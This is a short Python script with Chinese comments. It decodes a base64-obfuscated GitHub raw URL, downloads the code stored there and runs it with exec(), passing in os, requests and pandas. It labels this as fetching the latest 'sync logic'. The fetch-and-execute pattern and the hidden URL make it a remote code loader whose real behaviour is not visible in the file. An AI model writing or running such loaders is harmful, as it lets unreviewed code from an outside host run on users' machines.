# -*- coding: utf-8 -*-
import os
import sys
import base64
import zlib
import requests
import traceback
import pandas as pd
from urllib3.util.retry import Retry
from requests.adapters import HTTPAdapter

# ==========================================
# 🚀 配置区域
# ==========================================
# 你的目标代码地址：https://raw.githubusercontent.com/Shirasagi-no-Mai/website-setup/main/onlinechat
# 按照你提供的加密逻辑进行 Base64 编码
RAW_URL = "aHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL1NoaXJhc2FnaS1uby1NYWkvd2Vic2l0ZS1zZXR1cC9yZWZzL2hlYWRzL21haW4vb25saW5lY2hhdA=="
CONFIG_URL = base64.b64decode(RAW_URL).decode('utf-8')


def fetch_online_code():
    """从网络下载最新的同步逻辑"""
    session = requests.Session()
    # 设置重试机制，防止网络波动
    retries = Retry(total=3, backoff_factor=1, status_forcelist=[429, 500, 502, 503, 504])
    session.mount("https://", HTTPAdapter(max_retries=retries))

    try:
        print(f"正在获取最新代码...")
        response = session.get(CONFIG_URL, timeout=15)

        if response.status_code == 200:
            code = response.text.strip()
            if code:
                print(f"✅ 下载成功 (长度: {len(code)})")
                return code
            else:
                print("❌ 下载内容为空")
        else:
            print(f"❌ 下载失败，状态码: {response.status_code}")
    except Exception as e:
        print(f"❌ 网络异常: {e}")

    return None


def main():
    """执行主逻辑"""
    # 1. 下载代码
    code_text = fetch_online_code()

    if not code_text:
        print("❌ 无法获取代码，程序退出")
        input("按任意键退出...")
        sys.exit(1)

    # 2. 执行下载的代码
    # 注意：使用单独的 globals 字典，防止变量污染
    try:
        print("------------------------------------------")
        print("🚀 开始执行同步逻辑...")
        print("------------------------------------------")

        # 定义执行环境，预导入常用库
        exec_globals = {
            "__name__": "__main__",
            "pd": pd,
            "os": os,
            "requests": requests,
            "re": __import__('re'),
            "json": __import__('json'),
            "BeautifulSoup": __import__('bs4').BeautifulSoup if 'bs4' in sys.modules else None,
            "datetime": __import__('datetime').datetime,
            "math": __import__('math'),
            "urllib3": __import__('urllib3')
        }

        # 执行远程代码
        exec(code_text, exec_globals)

        print("------------------------------------------")
        print("✅ 同步任务圆满完成")
        print("------------------------------------------")

    except Exception as e:
        print("\n❌ 代码执行过程中出错")
        traceback.print_exc()
        input("\n按任意键退出...")
        sys.exit(1)


if __name__ == "__main__":
    main()
